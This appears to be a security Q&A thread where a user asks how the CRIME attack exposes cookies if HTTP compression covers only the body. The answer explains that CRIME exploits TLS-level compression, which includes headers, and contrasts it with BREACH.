3

Wiki on CRIME:

CRIME <...> is a security exploit against secret web cookies

RFC 2616 on Content-Encoding:

The Content-Encoding entity-header <...> when present, its value indicates what <...> codings have been applied to the entity-body, and thus what decoding mechanisms must be applied <...>

The question I have here:

If compression doesn't compress Cookies (as per RFC it compresses only the body and cookies are a part of the headers), how do the CRIME attack are even possible? There has to be some misunderstanding on my part.

NOTE: I am not asking on how to prevent the attack, but on specifics on how it works.

Community
  • 1
eddyP23
  • 259
  • 2
  • 12

1 Answers1

4

If compression doesn't compress Cookies (as per RFC it compresses only the body and cookies are a part of the headers), how do the CRIME attack are even possible?

CRIME does not work at the HTTP level but at the TLS level. The problem here is not the compression of the HTTP body like in BREACH but the compression of the complete connection at the TLS level. This way the compression includes also the HTTP header which contains the Cookie.

For a more detailed explanation see CRIME - How to beat the BEAST successor?.

Steffen Ullrich
  • 190,458
  • 29
  • 381
  • 434